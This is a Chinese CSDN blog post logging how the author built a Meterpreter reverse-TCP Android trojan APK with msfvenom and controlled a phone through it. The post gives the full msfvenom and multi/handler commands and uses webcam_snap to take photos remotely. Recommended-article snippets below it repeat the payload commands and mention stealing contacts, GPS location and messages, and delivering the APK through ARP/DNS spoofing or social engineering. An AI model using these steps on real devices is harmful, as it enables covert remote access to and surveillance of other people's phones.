简单记录自己利用meterpreter入侵安卓机

最新推荐文章于 2024-07-10 22:27:06 发布
最新推荐文章于 2024-07-10 22:27:06 发布
阅读量1.1k 收藏 9
点赞数
文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44731948/article/details/112726750
版权

简单记录自己利用meterpreter入侵安卓机

需要准备

  1. 一台安卓机
  2. 安装kali Linux系统

入侵流程

  1. kali终端执行 msfvenom -p android/meterpreter/reverse_tcp lhost=(kali linux的IP地址) lport=5555 R>/root/a.apk可以看到在root目录下生成了a.apk文件

  2. 将apk文件发送到安卓手机(方式自行选择,此处可扩展)

  3. 手机安装apk,为了测试成功,还需根据测试目的授予相应权限

  4. kali linux 打开工具metasploit framework输入use exploit/multi/handler

  5. 接着设置一系列参数set payload android/meterpreter/reverse_tcp

  6. set LHOST kali机IP地址

  7. set LPORT 5555

  8. exploit

  9. 在安卓机启动apk安装的软件,当出现以下代表监听成功
    在这里插入图片描述

  10. 接着执行webcam_snap,可以看到,图片被保存在根目录下(注意:执行命令时要一直点击手机apk软件的图标,否则获取不了照片)
    在这里插入图片描述

weixin_44731948
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Kali Linux利用MSF入侵安卓(零基础版超详细)
m0_74914256的博客
05-05 2万+
Kali Linux利用MSF入侵安卓新手下白版最详细,查看对方手系统信息,查看对方手安装哪些app文件,远程控制对方手拍摄一张照片,远程控制对方手开起视频聊天,实时查看对方手的信息,获取对方手的通讯录,实时获取对方手GPS定位
MSF入侵安卓
2301_77162959的博客
07-11 1331
里边安装了许许多多的工具。其中MSF就自带有。MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。现在要做的就是把木马文件搞到人家的手上,思路有很多 可以DNS arp劫持欺骗 只要对方用手下载文件 就会下载我们的木马文件。这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。还有社工什么等等的,这里我就简单的把木马文件弄我自己的手上做测试。
Kali初讲——非局域网下入侵
萌蠢骇客
06-04 2296
kali linux使用反弹shell入侵全流程——使用本教程请遵循网络安全法。
Metasploit - Android meterpreter
Nixawk
02-24 3630
Create a malicious apk fileCreate a malicious apk file (backdoor.apk), and raw is our format to output.msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=4444 R > backdoor.apkInstall
android实验四apk,Meterpreter之Android APK嵌入攻击实验
weixin_26806355的博客
05-28 857
大家有啥更好的apk远控方法可以一块来交流交流目前我知道的就只有①DroidJack 不免杀②SpyNote 不免杀③CS生成 这个还没试过④meterpreter嵌入apk在先知上看的那篇文章手动修改apk文件总是出错,我弄了一下午没成功,后面直接就用的这个工具。总结步骤在“apkmonk.com”或类似的镜像站点上查找现有的有趣APK应用程序。生成Metasploit APK文件。用“apk...
利用meterpreter生成一个简单的android木马
weixin_30673715的博客
07-21 261
这个学习过程我是在kali linux下进行的,成功的感染了自己的手,当然了apk包没改签名也没有加小图标,所以只能当是一个实验吧。 首先使用这个命令: 使用这个命令,可以生成一个apk包,但是我在这里标明一下,LHOST的IP写自己网络的IP,LPORT写一个没有被使用的端口,apk包名自己可以随意取。 接下来打开meterpreter软件: 加载模块: 之后设置宿主的IP和监听端口:...
Kali利用MSF渗透安卓_kali入侵安卓,从外包公司到今日头条offer
2401_84166672的博客
04-09 851
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
Kali 下对安卓的攻击
热门推荐
m0_66524548的博客
01-29 1万+
写在前面:本文仅限学术交流,请勿用他人实践 Kali对安卓的攻击(渗透) 我们首先需要确定本IP 这很简单,对于Kali来说我们需要打开终端并键入 ifconfig 即可获取自己的IP,然后我们需要确定安卓也就是被攻击者的IP,只需键入 fping -g 本IP地址/24 这时我们就能确定目标IP,这次教程主要围绕创建后门程序展开 在终端中执行: # msfvenom -p android/meterpreter/reverse_tcp LHOST=目标IP LPORT=
KALI使用MSF攻击安卓设备
最新发布
weixin_55357256的博客
07-10 2479
万事俱备,我们输入run来启动程序,输入完成后在手上点击刚才我们装好的应用,注意,点开应用后不会有任何反应,但应用已经进入后台运行,不必重复打开!有很多人在这一步失败了,要么没反应,要么代码乱窜个不停,那就是网络或手的问题。这期是kali使用MSF进行安卓渗透的保姆级别教程,话不多说,直接开始。现在准备工作做完了,我们下一步运行msfconsole。
木马渗透安卓系统实验
polaris___的博客
05-30 4462
1.实验内容 Metasploit后门攻击实现远程控制Android手 2.实验环境 设备 IP 子网掩码 Kali Linux(Hack) 222.20.78.6 255.255.248.0 Android(靶) 10.11.6...
利用metasploit对手进行渗透实战
qq_52907838的博客
08-18 3236
第一步:用ifconfig命令查看本ip地址 第二步:用msfvenom -p命令生成apk木马文件 具体命令为 msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.101.7 lport=8848 R > /home/kali/桌面/muma.apk 说明:lhost后面的IP地址为刚刚查到的本IP(这里也可以不用本IP),lport后面为自己规定的端口号,我规定的为8848,R为指定文件格式,后面接生成apk的
meterpreter命令使用
wutiangui的博客
04-25 645
getwd命令可以获得目标上当前的工作目录,相似的命令有getlwd。使用edit命令可以调用vi编辑器,对目标上的文件进行编辑。ipconfig命令用于获取目标主上的网络接口信息。download命令从目标上下载文件或文件夹。route命令用于显示目标主的路由信息。在目标上隐藏执行cmd.exe程序。background挂起会话。sysinfo查看系统信息。使用cat命令查看文件内容。sessions连接会话。
Metasploit对安卓进行控制
weixin_30785593的博客
05-26 375
1.in the server: msfvenom-pandroid/meterpreter/reverse_tcpLHOST=192.168.1.128LPORT=4444R> ./pentest.apkhttp://resources.infosecinstitute.com/mobile-device-penetration-testing/ useex...
Meterpreter基本命令详解
小人物的博客
05-14 2734
基本命令 1.background 命令    将Meterpreter终端隐藏在后台 2.sessions 命令   查看已经成功获取的会话 3.quit 命令    直接关闭当前的Meterpreter命令 4.shell 命令   可以获取系统的控制台Shell,如果目标系统上的命
android截屏代码
linxinfa的专栏
10-20 737
private Button m_btn; private MainActivity m_thisActv; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.la
msfvenom生成apk payload然后得到meterpreter shell
公众号shadow sock7
11-15 4433
先生成一个payload,带上meterpreter监听的地址和端口: msfvenom -p android/meterpreter/reverse_tcp LHOST=<your public IP> LPORT=80 -o msf.apk 由于大号端口在我的wifi环境下无法出去,所以这里我设置为80端口。 然后安装这个apk到手。 然后在msf上: use exploit/...
渗透测试window7,加强木马防范意识
yuanyuan2223的博客
04-06 5635
渗透测试window7,加强木马防范意识 通过钓鱼网站给win7系统植入后门并控制的流程 一、知识点总结: 1 生成后门程序 2 通过钓鱼方式植入木马靶(社工) 3 使用Metasploit配置监控并控制靶 4 控制靶我们能做什么 二、用到的系统和工具: 1 Kali(系统); 2 Windows7(靶系统); 3 Metasploit(渗透工具); 4 msfvenom(Metasploit自带的后门生成模块); 5 Meterpreter(后渗透常用通道); 三、使用msfvenom开始生成木马
meterpreter session 1 closed. Reason: died
gRpc的博客
08-25 1254
meterpreter session 1 closed. Reason: died
kali linux入侵安卓
06-06
Kali Linux是一种面向渗透测试和安全评估的Linux发行版,可以用来入侵安卓。要入侵安卓,需要先在手上安装可以让Kali Linux连接的安卓调试桥(Android Debug Bridge, ADB)。然后,通过Kali Linux上的工具(如Metasploit)来对手进行渗透测试。 请注意,未经用户允许的入侵任何设备都是非法的。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值